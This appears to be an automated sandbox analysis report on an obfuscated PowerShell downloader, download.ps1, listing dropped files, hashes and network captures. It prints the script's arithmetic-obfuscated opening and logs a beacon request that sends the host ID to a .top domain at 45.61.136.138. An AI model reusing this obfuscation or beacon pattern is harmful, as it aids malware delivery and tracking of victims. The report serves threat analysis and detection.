                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1310720
                                                                                                                          Entropy (8bit):0.7263313028799755
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0Q:9JZj5MiKNnNhoxu5
                                                                                                                          MD5:4C588118ADDC36E72DA8AE3A0BAB4783
                                                                                                                          SHA1:9E22617BF49C70A5B25431B0586C4DC82A3B842A
                                                                                                                          SHA-256:AF89BB59BCDE10E2CF91BD5F16B2719AEBD7100FCF9F356FC2BE737F68F98072
                                                                                                                          SHA-512:A31B9210DAF7595513B07D2F0BD8DD5381478AFB23C8CB87EBF0048AEE0ED9759945142935BDC6A6C70B1E2EF76CC2CFE6A38A7A255FCB4AD9E816328F760171
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:...........@..@9....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................Fajaj.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                                                          C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                          File Type:Extensible storage user DataBase, version 0x620, checksum 0x8bb39254, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1310720
                                                                                                                          Entropy (8bit):0.7556170209903799
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:FSB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:FazaSvGJzYj2UlmOlOL
                                                                                                                          MD5:80201555D43B4597C6B66FA00BD1E490
                                                                                                                          SHA1:4DA2497FA3FC505DD15D817530B5E94072B9B1AD
                                                                                                                          SHA-256:7E0832F7DDCFA5CF147280708734D1B46CF429CD799600E3DE5E14D58E98B1F1
                                                                                                                          SHA-512:DB0E24C20195FCB06CA7DA5FE040A4C02A9ECEBB99393D5715BCEF11DE7A4E5E612CA1AE8838CC510F716B5EB02E5522C8B3658A32A5E8B259374A490817D5D2
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:...T... .......7.......X\...;...{......................0.e......!...{?. +...|..h.g.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......9....{...............................................................................................................................................................................................2...{...................................UH. +...|..................q.+< +...|...........................#......h.g.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):16384
                                                                                                                          Entropy (8bit):0.07932796582777535
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:BdYeyJpAKluNaAPaU1lf7O23k/tolluxmO+l/SNxOf:fzG1luNDPaU3KUgmOH
                                                                                                                          MD5:7837E1476DF417493207A784DD274735
                                                                                                                          SHA1:8052E29D8CE7847EFCC35B559BEC119905228136
                                                                                                                          SHA-256:0C54026C94AE8BD1D9391EDDA6C0F477104AEEDEA1CDBFF58F81F669AE44BE3E
                                                                                                                          SHA-512:CC466F8ABDD483FB8AE21878C1D65679CA3E488C0583ED7EDA2A4ACAD9214B3DAC529553BA9C345BC949525A5561B8E224626E17813099482E5D4DF8A0C347C2
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:..T......................................;...{.. +...|...!...{?..........!...{?..!...{?..g...!...{?.................q.+< +...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):64
                                                                                                                          Entropy (8bit):1.1940658735648508
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:NlllulJtrXz:NllU
                                                                                                                          MD5:555DF2346FB3D24D5CA790C8762733FB
                                                                                                                          SHA1:90958270BEF8794C118507C4B68F7017A64CBCED
                                                                                                                          SHA-256:A6AB14F0EE51B0F81B714292FC934CB04C04D6C450ABA36007553DF495423648
                                                                                                                          SHA-512:A98E917D79FB17E54C99B88AC21BC87FBB3FA5E84610D2E0613AF6E181D7B4A209C5BFAFC5504097938B6B50E1C1B7D93C63282B48CEB2352D0621972B67DEF6
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:@...e...................................,............@..........

                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0cjw2hgu.u31.ps1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Reputation:high, very likely benign file
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2qc2qgp3.yio.psm1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_agsebfk3.ak4.psm1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ra1ni3ii.4qg.ps1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):60
                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                          Malicious:false
                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):6224
                                                                                                                          Entropy (8bit):3.724837836611027
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:zvvx83CKT9kvhkvCCtQWLWCHHlWLWCPHE:zvvxUlPLGLy
                                                                                                                          MD5:7260BAE83191419FEC7E8B2D3BFF8F0D
                                                                                                                          SHA1:9B6A29ABC87E7BEE91A598F6AF07A7C98854DEC9
                                                                                                                          SHA-256:EAFFFA8D7150233A5DDE53FE3F13A6DAE2619BBCCCA4C8CD171ACC7997FB28EF
                                                                                                                          SHA-512:7508B5AA6E264489D1FB556C1260A2B30B4E4C3B6A2E5F6EC5BFBA702C3BF279432F8663420A76D96F255E1F6F2F9408A27EFFA4A75F551F6C3BCC29B2421343
                                                                                                                          Malicious:false
                                                                                                                          Preview:...................................FL..................F.".. ...J.S....jE..Q..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S...U...Q..j}X..Q......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Yc............................^.A.p.p.D.a.t.a...B.V.1......Y`...Roaming.@......EW<2.Y`...../.....................s..R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.Y\.....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2.Y\.....2.....................T...W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.Y\.....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.Y\.....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.Yd.....u...........

                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9COEWJNK993LI7TTJ1II.temp

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):6224
                                                                                                                          Entropy (8bit):3.724837836611027
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:zvvx83CKT9kvhkvCCtQWLWCHHlWLWCPHE:zvvxUlPLGLy
                                                                                                                          MD5:7260BAE83191419FEC7E8B2D3BFF8F0D
                                                                                                                          SHA1:9B6A29ABC87E7BEE91A598F6AF07A7C98854DEC9
                                                                                                                          SHA-256:EAFFFA8D7150233A5DDE53FE3F13A6DAE2619BBCCCA4C8CD171ACC7997FB28EF
                                                                                                                          SHA-512:7508B5AA6E264489D1FB556C1260A2B30B4E4C3B6A2E5F6EC5BFBA702C3BF279432F8663420A76D96F255E1F6F2F9408A27EFFA4A75F551F6C3BCC29B2421343
                                                                                                                          Malicious:false
                                                                                                                          Preview:...................................FL..................F.".. ...J.S....jE..Q..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S...U...Q..j}X..Q......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Yc............................^.A.p.p.D.a.t.a...B.V.1......Y`...Roaming.@......EW<2.Y`...../.....................s..R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2.Y\.....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2.Y\.....2.....................T...W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2.Y\.....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2.Y\.....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2.Yd.....u...........

                                                                                                                          C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                          File Type:JSON data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):55
                                                                                                                          Entropy (8bit):4.306461250274409
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                          MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                          SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                          SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                          SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                          Malicious:false
                                                                                                                          Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                          Static File Info

                                                                                                                          General

                                                                                                                          File type:ASCII text, with very long lines (10789), with CRLF line terminators
                                                                                                                          Entropy (8bit):5.954005368845869
                                                                                                                          TrID:
                                                                                                                            File name:download.ps1
                                                                                                                            File size:20'304 bytes
                                                                                                                            MD5:96520d9bb837517f1891c6c4ed8a4274
                                                                                                                            SHA1:72adcc0aeb8f095262bc5c20b8c190e6b30f6f2e
                                                                                                                            SHA256:76f5fbdde4cf39aa96b9b88ba7925b04704dcaccfcff7742c5a2ea56cb49796f
                                                                                                                            SHA512:c7e033c471f30fafdf78d428d0ff1a2b17d3b1489e2bf4f5717b593f500122e09ffa3f6d0088d3f0d7fc118a425cf52a9cb4d0483e8cd92000d418967e0bd57c
                                                                                                                            SSDEEP:384:iVCpC12kiDOYiPfOyV+AgbU0qHGkQlKO9AjVS+Z+xRTqikLySDJWqe13l/QPx:iVCpG2kiD4WyQSJQlb9AzURTrEnE6Z
                                                                                                                            TLSH:DB925BF06B89F4D1C55E462E3A16BC083FA6756FE5EBBEC4FB62D78112812506F48C81
                                                                                                                            File Content Preview:$eiqcmyhbfn=$executioncontext;$edenbealatreatoninedorinonanenestion = (-jOIn (@((9586-(16329-(12885216/(-7818+(14871-5157))))),(-6168+6220),(4483-4426),(4908-4858),(238056/4251),(286416/5304),(430752/(6649+(9162755/8785))),(-3719+(10657776/2824)),(230725/

                                                                                                                            File Icon

                                                                                                                            Icon Hash:3270d6baae77db44

                                                                                                                            Network Behavior

                                                                                                                            Network Port Distribution

                                                                                                                            TCP Packets

                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                            Dec 18, 2024 20:43:14.503993034 CET4972580192.168.2.645.61.136.138
                                                                                                                            Dec 18, 2024 20:43:14.623723984 CET804972545.61.136.138192.168.2.6
                                                                                                                            Dec 18, 2024 20:43:14.623862028 CET4972580192.168.2.645.61.136.138
                                                                                                                            Dec 18, 2024 20:43:14.628422022 CET4972580192.168.2.645.61.136.138
                                                                                                                            Dec 18, 2024 20:43:14.749576092 CET804972545.61.136.138192.168.2.6
                                                                                                                            Dec 18, 2024 20:43:15.881907940 CET804972545.61.136.138192.168.2.6
                                                                                                                            Dec 18, 2024 20:43:16.000957012 CET4972580192.168.2.645.61.136.138
                                                                                                                            Dec 18, 2024 20:43:16.029629946 CET4973180192.168.2.6142.250.181.132
                                                                                                                            Dec 18, 2024 20:43:16.155561924 CET8049731142.250.181.132192.168.2.6
                                                                                                                            Dec 18, 2024 20:43:16.155708075 CET4973180192.168.2.6142.250.181.132
                                                                                                                            Dec 18, 2024 20:43:16.155987024 CET4973180192.168.2.6142.250.181.132
                                                                                                                            Dec 18, 2024 20:43:16.276293993 CET8049731142.250.181.132192.168.2.6
                                                                                                                            Dec 18, 2024 20:43:17.999583006 CET8049731142.250.181.132192.168.2.6
                                                                                                                            Dec 18, 2024 20:43:17.999835968 CET8049731142.250.181.132192.168.2.6
                                                                                                                            Dec 18, 2024 20:43:17.999872923 CET8049731142.250.181.132192.168.2.6
                                                                                                                            Dec 18, 2024 20:43:17.999924898 CET4973180192.168.2.6142.250.181.132
                                                                                                                            Dec 18, 2024 20:43:18.000299931 CET8049731142.250.181.132192.168.2.6
                                                                                                                            Dec 18, 2024 20:43:18.000334024 CET8049731142.250.181.132192.168.2.6
                                                                                                                            Dec 18, 2024 20:43:18.000355959 CET4973180192.168.2.6142.250.181.132
                                                                                                                            Dec 18, 2024 20:43:18.000369072 CET8049731142.250.181.132192.168.2.6
                                                                                                                            Dec 18, 2024 20:43:18.000957966 CET8049731142.250.181.132192.168.2.6
                                                                                                                            Dec 18, 2024 20:43:18.000993013 CET8049731142.250.181.132192.168.2.6
                                                                                                                            Dec 18, 2024 20:43:18.001010895 CET4973180192.168.2.6142.250.181.132
                                                                                                                            Dec 18, 2024 20:43:18.001027107 CET8049731142.250.181.132192.168.2.6
                                                                                                                            Dec 18, 2024 20:43:18.001039982 CET4973180192.168.2.6142.250.181.132
                                                                                                                            Dec 18, 2024 20:43:18.001610041 CET8049731142.250.181.132192.168.2.6
                                                                                                                            Dec 18, 2024 20:43:18.005284071 CET4973180192.168.2.6142.250.181.132
                                                                                                                            Dec 18, 2024 20:43:18.119579077 CET8049731142.250.181.132192.168.2.6
                                                                                                                            Dec 18, 2024 20:43:18.119714975 CET8049731142.250.181.132192.168.2.6
                                                                                                                            Dec 18, 2024 20:43:18.121526957 CET4973180192.168.2.6142.250.181.132
                                                                                                                            Dec 18, 2024 20:43:18.124108076 CET8049731142.250.181.132192.168.2.6
                                                                                                                            Dec 18, 2024 20:43:18.173517942 CET4973180192.168.2.6142.250.181.132
                                                                                                                            Dec 18, 2024 20:43:18.192135096 CET8049731142.250.181.132192.168.2.6
                                                                                                                            Dec 18, 2024 20:43:18.192173958 CET8049731142.250.181.132192.168.2.6
                                                                                                                            Dec 18, 2024 20:43:18.193444014 CET4973180192.168.2.6142.250.181.132
                                                                                                                            Dec 18, 2024 20:43:18.196007967 CET8049731142.250.181.132192.168.2.6
                                                                                                                            Dec 18, 2024 20:43:18.197551966 CET8049731142.250.181.132192.168.2.6
                                                                                                                            Dec 18, 2024 20:43:18.197609901 CET4973180192.168.2.6142.250.181.132
                                                                                                                            Dec 18, 2024 20:43:18.197762966 CET8049731142.250.181.132192.168.2.6
                                                                                                                            Dec 18, 2024 20:43:18.206197023 CET8049731142.250.181.132192.168.2.6
                                                                                                                            Dec 18, 2024 20:43:18.206857920 CET8049731142.250.181.132192.168.2.6
                                                                                                                            Dec 18, 2024 20:43:18.206926107 CET4973180192.168.2.6142.250.181.132
                                                                                                                            Dec 18, 2024 20:43:18.206981897 CET8049731142.250.181.132192.168.2.6
                                                                                                                            Dec 18, 2024 20:43:18.207041025 CET4973180192.168.2.6142.250.181.132
                                                                                                                            Dec 18, 2024 20:43:18.215399027 CET8049731142.250.181.132192.168.2.6
                                                                                                                            Dec 18, 2024 20:43:18.219971895 CET8049731142.250.181.132192.168.2.6
                                                                                                                            Dec 18, 2024 20:43:18.220007896 CET8049731142.250.181.132192.168.2.6
                                                                                                                            Dec 18, 2024 20:43:18.220027924 CET4973180192.168.2.6142.250.181.132
                                                                                                                            Dec 18, 2024 20:43:18.225102901 CET8049731142.250.181.132192.168.2.6
                                                                                                                            Dec 18, 2024 20:43:18.225220919 CET4973180192.168.2.6142.250.181.132
                                                                                                                            Dec 18, 2024 20:43:18.233858109 CET8049731142.250.181.132192.168.2.6
                                                                                                                            Dec 18, 2024 20:43:18.233874083 CET8049731142.250.181.132192.168.2.6
                                                                                                                            Dec 18, 2024 20:43:18.233939886 CET4973180192.168.2.6142.250.181.132
                                                                                                                            Dec 18, 2024 20:43:18.237497091 CET8049731142.250.181.132192.168.2.6
                                                                                                                            Dec 18, 2024 20:43:18.247230053 CET8049731142.250.181.132192.168.2.6
                                                                                                                            Dec 18, 2024 20:43:18.247256041 CET8049731142.250.181.132192.168.2.6
                                                                                                                            Dec 18, 2024 20:43:18.247318029 CET4973180192.168.2.6142.250.181.132
                                                                                                                            Dec 18, 2024 20:43:18.251408100 CET8049731142.250.181.132192.168.2.6
                                                                                                                            Dec 18, 2024 20:43:18.251981020 CET4973180192.168.2.6142.250.181.132
                                                                                                                            Dec 18, 2024 20:43:18.261110067 CET8049731142.250.181.132192.168.2.6
                                                                                                                            Dec 18, 2024 20:43:18.261131048 CET8049731142.250.181.132192.168.2.6
                                                                                                                            Dec 18, 2024 20:43:18.261193991 CET4973180192.168.2.6142.250.181.132
                                                                                                                            Dec 18, 2024 20:43:18.265338898 CET8049731142.250.181.132192.168.2.6
                                                                                                                            Dec 18, 2024 20:43:18.300013065 CET8049731142.250.181.132192.168.2.6
                                                                                                                            Dec 18, 2024 20:43:18.300076962 CET4973180192.168.2.6142.250.181.132
                                                                                                                            Dec 18, 2024 20:43:18.300776005 CET8049731142.250.181.132192.168.2.6
                                                                                                                            Dec 18, 2024 20:43:18.316426039 CET8049731142.250.181.132192.168.2.6
                                                                                                                            Dec 18, 2024 20:43:18.316442966 CET8049731142.250.181.132192.168.2.6
                                                                                                                            Dec 18, 2024 20:43:18.316482067 CET4973180192.168.2.6142.250.181.132
                                                                                                                            Dec 18, 2024 20:43:18.319788933 CET8049731142.250.181.132192.168.2.6
                                                                                                                            Dec 18, 2024 20:43:18.320739031 CET8049731142.250.181.132192.168.2.6
                                                                                                                            Dec 18, 2024 20:43:18.320806980 CET4973180192.168.2.6142.250.181.132
                                                                                                                            Dec 18, 2024 20:43:18.332016945 CET8049731142.250.181.132192.168.2.6
                                                                                                                            Dec 18, 2024 20:43:18.333630085 CET4973180192.168.2.6142.250.181.132
                                                                                                                            Dec 18, 2024 20:43:18.384203911 CET8049731142.250.181.132192.168.2.6
                                                                                                                            Dec 18, 2024 20:43:18.384365082 CET8049731142.250.181.132192.168.2.6
                                                                                                                            Dec 18, 2024 20:43:18.384488106 CET4973180192.168.2.6142.250.181.132
                                                                                                                            Dec 18, 2024 20:43:18.386454105 CET8049731142.250.181.132192.168.2.6
                                                                                                                            Dec 18, 2024 20:43:18.386600018 CET8049731142.250.181.132192.168.2.6
                                                                                                                            Dec 18, 2024 20:43:18.386887074 CET4973180192.168.2.6142.250.181.132
                                                                                                                            Dec 18, 2024 20:43:18.391190052 CET8049731142.250.181.132192.168.2.6
                                                                                                                            Dec 18, 2024 20:43:18.395001888 CET8049731142.250.181.132192.168.2.6
                                                                                                                            Dec 18, 2024 20:43:18.395067930 CET4973180192.168.2.6142.250.181.132
                                                                                                                            Dec 18, 2024 20:43:18.396414995 CET8049731142.250.181.132192.168.2.6
                                                                                                                            Dec 18, 2024 20:43:18.400516033 CET8049731142.250.181.132192.168.2.6
                                                                                                                            Dec 18, 2024 20:43:18.400573969 CET4973180192.168.2.6142.250.181.132
                                                                                                                            Dec 18, 2024 20:43:18.409257889 CET8049731142.250.181.132192.168.2.6
                                                                                                                            Dec 18, 2024 20:43:18.409425974 CET8049731142.250.181.132192.168.2.6
                                                                                                                            Dec 18, 2024 20:43:18.409483910 CET4973180192.168.2.6142.250.181.132
                                                                                                                            Dec 18, 2024 20:43:18.411389112 CET8049731142.250.181.132192.168.2.6
                                                                                                                            Dec 18, 2024 20:43:18.422991991 CET8049731142.250.181.132192.168.2.6
                                                                                                                            Dec 18, 2024 20:43:18.423161983 CET4973180192.168.2.6142.250.181.132
                                                                                                                            Dec 18, 2024 20:43:18.423249006 CET8049731142.250.181.132192.168.2.6
                                                                                                                            Dec 18, 2024 20:43:18.426534891 CET8049731142.250.181.132192.168.2.6
                                                                                                                            Dec 18, 2024 20:43:18.426599026 CET4973180192.168.2.6142.250.181.132
                                                                                                                            Dec 18, 2024 20:43:18.440932989 CET8049731142.250.181.132192.168.2.6
                                                                                                                            Dec 18, 2024 20:43:18.440974951 CET8049731142.250.181.132192.168.2.6
                                                                                                                            Dec 18, 2024 20:43:18.441025972 CET4973180192.168.2.6142.250.181.132
                                                                                                                            Dec 18, 2024 20:43:19.085818052 CET4972580192.168.2.645.61.136.138
                                                                                                                            Dec 18, 2024 20:43:19.086513996 CET4973180192.168.2.6142.250.181.132

                                                                                                                            UDP Packets

                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                            Dec 18, 2024 20:43:14.040667057 CET5285253192.168.2.61.1.1.1
                                                                                                                            Dec 18, 2024 20:43:14.492865086 CET53528521.1.1.1192.168.2.6
                                                                                                                            Dec 18, 2024 20:43:15.883300066 CET6279353192.168.2.61.1.1.1
                                                                                                                            Dec 18, 2024 20:43:16.021223068 CET53627931.1.1.1192.168.2.6

                                                                                                                            DNS Queries

                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                            Dec 18, 2024 20:43:14.040667057 CET192.168.2.61.1.1.10x9047Standard query (0)cmacnnkfbhlcncm.topA (IP address)IN (0x0001)false
                                                                                                                            Dec 18, 2024 20:43:15.883300066 CET192.168.2.61.1.1.10x9f6aStandard query (0)www.google.comA (IP address)IN (0x0001)false

                                                                                                                            DNS Answers

                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                            Dec 18, 2024 20:43:04.525916100 CET1.1.1.1192.168.2.60x27feNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Dec 18, 2024 20:43:04.525916100 CET1.1.1.1192.168.2.60x27feNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                            Dec 18, 2024 20:43:14.492865086 CET1.1.1.1192.168.2.60x9047No error (0)cmacnnkfbhlcncm.top45.61.136.138A (IP address)IN (0x0001)false
                                                                                                                            Dec 18, 2024 20:43:16.021223068 CET1.1.1.1192.168.2.60x9f6aNo error (0)www.google.com142.250.181.132A (IP address)IN (0x0001)false
                                                                                                                            Dec 18, 2024 20:43:33.180354118 CET1.1.1.1192.168.2.60xbec5No error (0)g-bing-com.ax-0001.ax-msedge.netax-0001.ax-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                            Dec 18, 2024 20:43:33.180354118 CET1.1.1.1192.168.2.60xbec5No error (0)ax-0001.ax-msedge.net150.171.27.10A (IP address)IN (0x0001)false
                                                                                                                            Dec 18, 2024 20:43:33.180354118 CET1.1.1.1192.168.2.60xbec5No error (0)ax-0001.ax-msedge.net150.171.28.10A (IP address)IN (0x0001)false

                                                                                                                            HTTP Request Dependency Graph

                                                                                                                            • cmacnnkfbhlcncm.top
                                                                                                                            • www.google.com

                                                                                                                            HTTP Packets

                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            0192.168.2.64972545.61.136.138802196C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 18, 2024 20:43:14.628422022 CET218OUTGET /xqceolfz5dhtr.php?id=user-PC&key=58037436404&s=527 HTTP/1.1
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                            Host: cmacnnkfbhlcncm.top
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Dec 18, 2024 20:43:15.881907940 CET166INHTTP/1.1 302 Found
                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                            Date: Wed, 18 Dec 2024 19:43:15 GMT
                                                                                                                            Content-Length: 0
                                                                                                                            Connection: keep-alive
                                                                                                                            Location: http://www.google.com


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
